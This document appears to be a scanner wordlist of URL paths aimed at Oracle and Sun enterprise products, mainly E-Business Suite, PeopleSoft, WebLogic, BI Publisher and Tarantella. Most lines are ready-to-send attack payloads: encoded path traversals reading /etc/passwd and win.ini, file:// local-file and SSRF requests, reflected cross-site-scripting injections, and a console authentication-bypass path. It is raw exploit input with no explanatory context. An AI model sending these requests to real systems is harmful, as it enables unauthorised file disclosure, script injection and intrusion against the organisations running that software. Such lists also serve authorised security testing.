/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/resource/file%3a///etc/passwd/
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2
/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4
/OA_HTML/ibeCAcpSSOReg.jsp
/OA_HTML/ibeCRgpPrimaryCreate.jsp
/OA_HTML/ibeCRgpIndividualUser.jsp
/OA_HTML/ibeCRgpPartnerPriCreate.jsp
/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/console/images/%252e%252e%252fconsole.portal
/OA_HTML/jtfwrepo.xml
/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/psc/ps/?&cmd=login&languageCd=ENG
/psp/csperf/?&cmd=login&languageCd=ENG
/psp/FMPRD/?&cmd=login&languageCd=ENG
/psp/csprd/?&cmd=login&languageCd=ENG
/psp/hcmprdfp/?&cmd=login&languageCd=ENG
/psp/HRPRODASP/?&cmd=login&languageCd=ENG
/psp/guest/?&cmd=login&languageCd=ENG
/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG
/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG
/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG
/psp/applyuth/?&cmd=login&languageCd=ENG
/psp/HRPRD/?&cmd=login&languageCd=ENG
/psp/CAREERS/?&cmd=login&languageCd=ENG
/psp/heprod_5/?&cmd=login&languageCd=ENG
/psp/saprod/?&cmd=login&languageCd=ENG
/psp/hr857prd_er/?&cmd=login&languageCd=ENG
/psp/CHUMPRDM/?&cmd=login&languageCd=ENG
/psp/HR92PRD/?&cmd=login&languageCd=ENG
/psp/cangate_1/?&cmd=login&languageCd=ENG
/psp/ihprd/?&cmd=login&languageCd=ENG
/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=win.ini&ifl=c:/windows/
/RP?wsrp-url=file:///etc/passwd
/RP?wsrp-url=file:///c:\\windows\\win.ini
/
/api/
/compress
/content
/data
/api/data
/upload
/api/compare
/compress/analyze
